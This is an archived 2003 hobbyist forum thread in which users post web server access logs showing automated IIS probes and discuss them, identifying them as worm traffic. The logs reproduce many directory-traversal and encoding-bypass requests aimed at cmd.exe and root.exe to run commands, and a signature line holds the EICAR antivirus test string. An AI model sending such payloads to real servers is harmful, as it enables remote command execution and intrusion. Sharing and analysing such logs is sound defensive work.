• Welcome to Valhalla Legends Archive.
 

uber-l33t h4x0r

Started by UserLoser, September 08, 2003, 07:35 PM

Previous topic - Next topic

UserLoser

Found this in my log from my webserver running on my computer, I found it funny ;D

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268

Yoni

Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.

Grok

vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time.

The MSADC is an exploitable sample site that is installed with II4 and IIS5, which allow increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.

UserLoser

Hmm, I'm only Windows XP Home Edition, and that's an Abyss Web Server.  I don't think by doing that they can confuse the server or get past it or whatever - But, I don't know anything about website/server cracking

iago

I scanned his ip with thing's scanner, found nothing sadly :(
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


UserLoser


iago

I only see one ip.. assumed it was his :P
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


UserLoser

Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P

Thing

#8
Those 14 entries are the signature of a machine infected with CodeRed.  It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file.  Here is a small portion of that file:
63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
That sucking sound you hear is my bandwidth.

UserLoser

Nobody infects my computer!

Fr0z3N

#10
134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Only one I saw. But I'm to lazy to look through them all.

On Apache, Thing wanna send me that file by $torm?    :D

Thing

QuoteOn Apache, Thing wanna send me that file by $torm?
You should ask him.  He wrote it.
That sucking sound you hear is my bandwidth.

Fr0z3N

where would I see him to ask?

Thing

That sucking sound you hear is my bandwidth.